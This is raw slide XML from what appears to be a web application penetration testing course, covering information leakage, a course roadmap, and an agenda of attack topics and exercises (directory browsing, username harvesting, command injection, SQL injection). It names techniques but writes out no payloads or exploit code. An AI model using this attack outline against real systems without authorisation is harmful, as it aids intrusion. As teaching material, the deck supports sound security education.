          <p:cNvPr id="83971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502920" y="1421130"/>
            <a:ext cx="8153400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information leakage is when the application or target provides information to the user unintentionally</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One of the simplest forms of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When testing an application, information is power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>…So even information that may seem unimportant on the surface can actually be used against an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, image directories that allow browsing can show page headers and menu graphics that reveal portions of the site the client doesn't have access too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>During recon and mapping, we may have gathered some of this information, but now let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s find more while manually interacting with the application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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Information Leakage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="1275789"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information can come in many forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This information can lead to other vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rarely direct exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500197" y="1848017"/>
            <a:ext cx="3143156" cy="2656118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3434446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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</a:t>
            </a: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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="76200"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Directory Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84994" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
